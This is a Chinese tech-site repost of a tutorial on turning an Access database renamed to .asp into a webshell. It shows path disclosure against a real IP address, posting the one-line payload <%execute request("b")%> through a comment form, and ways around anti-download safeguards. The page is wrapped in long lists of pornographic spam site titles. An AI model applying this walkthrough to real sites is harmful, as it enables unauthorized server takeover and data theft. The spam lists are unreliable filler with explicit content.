亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 學院 > 開發設計 > 正文

特別提示:改MDB為ASP所帶來的災難

2019-11-18 12:02:25
字體:
來源:轉載
供稿:網友

  可能是隨著網絡安全技術的發展吧,治理員的素質都在提高,在使用access+asp系統時,為不數據庫被人下載,到把mdb改為asp或asa。先不說直接改后綴,直接可以用網快等工具直接下載,其實這樣你已經是為入侵者打開了大門。入侵者可以利用asp/asa為后綴的數據庫直接得到webshell。
  
  一.思路
  
  大家都知道<%%>為asp文件的標志符,也就是說一個asp文件只會去執行<% %>之間的代碼,access+asp的web系統的所有數據都是存放在數據庫文件里(mdb文件),由于治理者把mdb文件改為了asp文件,假如我們提交的數據里包含有<%%>,那當我們訪問這個asp數據庫的時候就會去執行<%%>之間的代碼。這樣導致我們只提交惡意代碼給數據庫,那么asp后綴的數據庫就是我們的webshell了。
  
  二.示例
  
  隨便找個目標,首先我們暴庫,看是不是asp后綴的數據庫:
  http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
  
  返回:
  
  程序代碼:
  
  Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
  缺少 'End'
  
  /iisHelp/common/500-100.asp,行242
  
  Microsoft JET Database Engine 錯誤 '80004005'
  
  'D:/log_mdb/%29dlog_mdb%29.asp'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。
  
  /test/conn.asp,行18
  
  我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網際快車等工具直接下載數據庫(這里我們不討論)。我們回到主頁看到有提供“網友評論”功能。我們注冊個用戶,發一條評論:
  
  程序代碼:
  < %execute request("b")%>
  
  這樣我們就把asp代碼:<%execute request("b")%>寫入了數據庫,那么數據庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到:
  
  /iisHelp/common/500-100.asp,行242
  Microsoft VBScript 運行時錯誤 錯誤 '800a000d'
  
  類型不匹配: 'execute'
  
  /test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266
  
  哈哈,我們的插入的代碼運行了。如下圖:
  
  注重:我們在向數據庫提交代碼時,代碼內容不可以太大。所以我們采用
  
  程序代碼:
  <%execute request("b")%>
  
  三.其他一些問題和思路
  
 ?。保畬τ诟牧撕缶Y為asp,還對數據庫里加入了<%=’a’-1%>等非法的asp代碼來徹底防止下載的數據庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運行,將只會顯示前面非法代碼的錯誤,而不去執行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯的代碼前加入兼容錯誤的代碼,就可以得到正確顯示執行我們插入的webshell代碼了。
  
 ?。玻畬τ跊]有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺密碼,進了后臺,可以利用數據庫備用改后綴為asp。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
91影院在线免费观看视频| 亚洲电影在线观看| 日韩中文字幕在线看| 久久久久久网址| 日本亚洲欧美成人| 亚洲最大福利视频| 欧美大片网站在线观看| 久久久国产精彩视频美女艺术照福利| 日韩精品视频观看| 久久精品2019中文字幕| 亚洲天堂成人在线视频| 国产91免费观看| 日韩成人高清在线| 精品电影在线观看| 欧美日韩aaaa| 亚洲最大的网站| 国产精品激情av在线播放| 亚洲欧洲免费视频| 欧美激情在线观看| 一级做a爰片久久毛片美女图片| www.日韩不卡电影av| 欧美日韩午夜激情| 国产在线观看精品| 这里只有精品视频在线| 久久久久久久电影一区| 精品国内产的精品视频在线观看| 国产精品欧美日韩久久| 欧洲日韩成人av| 91香蕉国产在线观看| 日韩免费在线观看视频| 国产精品美女在线| www高清在线视频日韩欧美| 夜夜嗨av色一区二区不卡| 少妇高潮久久久久久潘金莲| 欧美在线亚洲一区| 亚洲第一国产精品| 亚洲国产精彩中文乱码av在线播放| 91精品久久久久久久久久入口| 亚洲男人7777| 国产午夜精品理论片a级探花| 国产精品香蕉国产| 97视频在线观看视频免费视频| 欧美午夜无遮挡| 日韩av在线免费看| 久久综合国产精品台湾中文娱乐网| 国产成人97精品免费看片| 日韩电影大全免费观看2023年上| 国产日韩欧美成人| 亚洲日本成人女熟在线观看| 日韩av中文在线| 久久久久国产视频| 国产精品视频自在线| 96精品视频在线| 亚洲小视频在线观看| 91精品免费视频| 日本精品性网站在线观看| 成人h片在线播放免费网站| 操91在线视频| 亚洲男人天堂久| 久久精品免费播放| 精品偷拍一区二区三区在线看| 欧美电影免费观看网站| 97在线看福利| 午夜精品久久久久久99热软件| 成人性生交大片免费观看嘿嘿视频| 日韩欧美aⅴ综合网站发布| 久久成人18免费网站| 欧美成人一二三| 国产精品视频999| 成人春色激情网| 欧美制服第一页| 中文字幕亚洲自拍| 国产精品吴梦梦| 国产成人福利视频| 久久久久久69| 97国产在线观看| 欧美激情一二三| www日韩中文字幕在线看| 午夜精品久久久99热福利| 欧美极度另类性三渗透| 欧美国产日本高清在线| 久久九九免费视频| 国产精品视频1区| 国产精品吹潮在线观看| 国产一区视频在线播放| 亚洲综合第一页| 日韩在线观看av| 97国产真实伦对白精彩视频8| 成人伊人精品色xxxx视频| 91久久精品一区| 亚洲综合成人婷婷小说| 日韩美女视频免费看| 国产丝袜视频一区| 国产精品美腿一区在线看| 国产欧美久久久久久| 欧美剧在线观看| 91久久嫩草影院一区二区| 伊人久久免费视频| 久久久久久av| 91av中文字幕| 欧美性xxxxxxxxx| 性欧美办公室18xxxxhd| 国产成人精品免高潮在线观看| 日韩网站免费观看高清| 国产成人精品一区| 91精品国产高清自在线看超| 国产精品黄页免费高清在线观看| 中文一区二区视频| 亚洲精品网站在线播放gif| 国语自产精品视频在线看抢先版图片| 亚洲成成品网站| 欧美亚洲国产日本| 国产原创欧美精品| 国产精品com| 国产福利视频一区二区| 久久久久久av| 综合网中文字幕| 性视频1819p久久| 欧美性xxxx极品hd欧美风情| 欧美大码xxxx| 2020欧美日韩在线视频| 国产成人一区二区三区小说| 亚洲第一色中文字幕| 最近2019中文字幕mv免费看| 全球成人中文在线| 九九久久国产精品| 亚洲国产精品成人精品| 国产精品永久免费| 最近日韩中文字幕中文| 成人免费xxxxx在线观看| 国产日韩欧美在线| 91免费看视频.| 一本色道久久88精品综合| 美女性感视频久久久| 国产成人+综合亚洲+天堂| 欧美日韩国产区| 岛国av一区二区在线在线观看| 久久久久久久久国产| 亚洲视频在线看| 2020国产精品视频| 国产精品久久久久久久7电影| 亚洲精品电影在线观看| 精品成人国产在线观看男人呻吟| 91久久精品久久国产性色也91| 综合国产在线视频| 69av成年福利视频| 蜜臀久久99精品久久久无需会员| 日韩电影在线观看永久视频免费网站| 91精品国产91久久久久久吃药| 亚洲黄色av女优在线观看| 日韩福利视频在线观看| 91国内产香蕉| 久久精品亚洲精品| 国产精品女主播视频| 97精品一区二区视频在线观看| 国产日韩在线看片| 亚洲欧美国产视频| 国产精品ⅴa在线观看h| 欧美午夜宅男影院在线观看| 日韩av理论片| www.亚洲免费视频| 中文字幕亚洲一区在线观看| 亚洲精品不卡在线| 日韩成人中文字幕在线观看|